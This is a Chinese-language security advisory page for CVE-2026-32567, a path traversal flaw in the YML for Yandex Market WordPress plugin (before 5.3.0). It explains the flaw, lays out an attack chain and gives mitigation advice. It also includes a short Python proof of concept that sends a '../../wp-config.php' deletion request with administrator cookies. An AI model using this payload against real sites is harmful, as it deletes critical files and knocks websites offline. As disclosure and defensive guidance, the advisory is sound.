CVE-2026-32567 CVSS 6.8 中危

CVE-2026-32567 YML插件路径遍历漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32567

漏洞类型

路径遍历

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

YML for Yandex Market

漏洞概述

icopydoc开发的YML for Yandex Market WordPress插件存在路径遍历漏洞。该漏洞由于对目标目录路径名限制不严，导致拥有高权限的认证攻击者能够利用路径遍历序列（如../）访问受限目录之外的文件系统资源。此问题影响5.3.0之前的所有版本，攻击者可利用此漏洞删除任意文件，对网站可用性造成严重影响。

技术细节

该漏洞的根源在于icopydoc YML for Yandex Market插件对文件路径的校验逻辑存在缺陷。当插件处理文件管理相关的功能时（如导出或删除文件），未对用户提供的“file”参数进行充分的规范化处理或未使用`basename()`等函数进行过滤。攻击者必须拥有高权限账户（PR:H），这通常意味着攻击者已经攻破了管理员账户或拥有编辑权限。利用该漏洞时，攻击者通过在请求参数中插入“../”或“..%5c”等目录跳转符，绕过原本预设的插件目录限制，进而访问服务器文件系统的任意路径。结合参考信息中提到的“任意文件删除”，攻击者可以指定删除`wp-config.php`、`index.php`等关键系统文件，导致网站服务完全中断（A:H），造成严重的拒绝服务攻击后果。

攻击链分析

STEP 1

侦察

攻击者扫描目标WordPress站点，识别是否安装了YML for Yandex Market插件，并确认版本低于5.3.0。

STEP 2

获取权限

由于漏洞需要高权限（PR:H），攻击者通过暴力破解、钓鱼或利用其他漏洞获取网站管理员账户凭证。

STEP 3

构造载荷

攻击者利用路径遍历技术（../），构造包含恶意文件路径的HTTP请求，指向系统关键文件。

STEP 4

执行攻击

发送携带载荷的请求至服务器端，插件未过滤路径字符，执行删除操作。

STEP 5

达成影响

服务器上的关键文件被删除，导致网站无法访问（拒绝服务），可用性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-32567: Path Traversal in YML for Yandex Market
# Note: Requires High Privilege (Admin) session cookies

target = "http://example.com/wp-admin/admin-ajax.php"

# Example payload to delete a critical file
payload = {
    "action": "yml_for_yandex_market_delete_file", 
    "file": "../../wp-config.php"  # Traversal payload
}

# Admin cookies (required for PR:H)
cookies = {
    "wordpress_logged_in_xxx": "admin_session_value",
    "wordpress_sec_xxx": "admin_sec_value"
}

response = requests.post(target, data=payload, cookies=cookies)

if response.status_code == 200:
    print("[+] Request sent successfully. Check if file is deleted.")
else:
    print("[-] Failed to send request.")

影响范围

YML for Yandex Market < 5.3.0

防御指南

临时缓解措施

若无法立即升级，建议暂时禁用该插件以阻断攻击路径。同时，应在Web应用防火墙（WAF）中部署规则，拦截包含路径遍历特征（如“../”、“..\”）的请求参数，并加强对后台管理操作的异常监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表